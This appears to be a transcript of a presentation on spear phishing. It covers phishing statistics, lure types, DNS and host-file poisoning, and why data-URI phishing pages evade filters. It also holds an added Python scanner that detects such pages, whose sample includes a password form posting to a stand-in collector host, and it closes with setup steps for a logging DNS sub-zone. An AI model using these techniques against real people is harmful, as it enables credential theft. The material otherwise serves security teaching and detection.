Spear phishing with social media
Transcript of Spear phishing with social media
Phishing as threat
"Phishing is the act of attempting to acquire information such as usernames, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication."
Open Source Security
Penetration testing execution standard
91% of APTs begin with spear phishing
Each phishing attack compromises a very small number of customers (0.000564%), but due to the large number of phishing attacks, the aggregated number is significant
45% of bank customers who are redirected to a phishing site divulge their personal credentials
An analysis of 69,000 workers around the world found that 23 percent fell for spear phishing scenarios
0.47% of a bank’s customers fall victim to phishing attacks each year, which translates to between $2.4M-$9.4M in annual fraud losses per one million online banking clients
Phishing - Types of attack
Correct account details
Account at risk
Cancel fake order
Dispute unauthorized change
Keyloggers and Screenloggers
Host file poisoning
System Reconfiguration attack
Host file change
Poison DNS cache
fbStalker - OSINT tool for Facebook - Based on Facebook Graph and other stuff
The data URI scheme is a URI (uniform resource identifier) scheme that provides a way to include data in-line in web pages as if they were external resources. It is a form of a file literal or here document. This technique allows normally separate elements such as images and style sheets to be fetched in a single HTTP request rather than multiple HTTP requests, which can be more efficient.
Benefits of Data URI
Phishing web pages may be more elusive as they are passed around the Internet because phishing no longer requires web hosting of the page.
It also defeats traditional defenses against phishing attacks, such as web filtering and reputation management, because victims don’t need to communicate with an attack server to get phished.
We can create the phishing pages more easily. A personalized phishing web page can be created automatically, based on gathered information, and transmitted to one victim only. There is reason to believe that the data URI scheme can provide other unknown attack vectors.
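Because a data URI carries the whole page inside the link, URL reputation has nothing to look up, so a mail or proxy filter has to inspect the URI itself. The following is an added example, not part of the original presentation: a content scanner that finds `data:` URIs with an active media type, decodes them, and flags credential forms. The sample body, the `collector.example` host and all function names are constructed for illustration.

```python
import base64
import re
from urllib.parse import unquote_to_bytes

# Constructed sample: an HTML e-mail body with one benign inline image and
# one link whose target is a complete HTML page carried in a data: URI.
_PAGE = b'<form action="https://collector.example/p"><input type="password" name="pw"></form>'
SAMPLE_BODY = (
    '<img src="data:image/png;base64,iVBORw0KGgo=">'
    '<a href="data:text/html;base64,' + base64.b64encode(_PAGE).decode() + '">Verify account</a>'
)

# RFC 2397 syntax: data:[<mediatype>][;base64],<data>
DATA_URI = re.compile(r'\bdata:([^,;"\'\s]*)((?:;[^,;"\'\s]+)*),([^"\'\s>]*)', re.I)
ACTIVE_TYPES = {"text/html", "application/xhtml+xml", "image/svg+xml",
                "text/javascript", "application/javascript"}
CREDENTIAL_HINTS = (b"<form", b'type="password"', b"type='password'", b"type=password")


def decode_payload(params, data):
    """Return the payload bytes, handling both base64 and percent-encoding."""
    if "base64" in [p.lower() for p in params.split(";") if p]:
        cleaned = unquote_to_bytes(data)  # base64 text may itself be percent-encoded
        try:
            return base64.b64decode(cleaned + b"=" * (-len(cleaned) % 4))
        except ValueError:
            return b""
    return unquote_to_bytes(data)


def scan(body):
    """Return one finding per data: URI that carries active content."""
    findings = []
    for m in DATA_URI.finditer(body):
        mediatype = (m.group(1) or "text/plain").lower()  # RFC 2397 default type
        if mediatype not in ACTIVE_TYPES:
            continue  # inline images, fonts and plain text are not flagged
        payload = decode_payload(m.group(2), m.group(3)).lower()
        findings.append({
            "mediatype": mediatype,
            "size": len(payload),
            "credential_form": any(h in payload for h in CREDENTIAL_HINTS),
        })
    return findings


if __name__ == "__main__":
    print(scan(SAMPLE_BODY))
```
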
What You Need
A domain 'yourdomain.com' where you can delegate zones and set NS resource records in DNS.
A standard DNS server of your choice (e.g. BIND) with query logging enabled.
A sub-zone named 'file1.yourdomain.com' with a NS record pointing to the logging DNS server.
A programming or scripting language: Python, C++, bash, PowerShell, etc.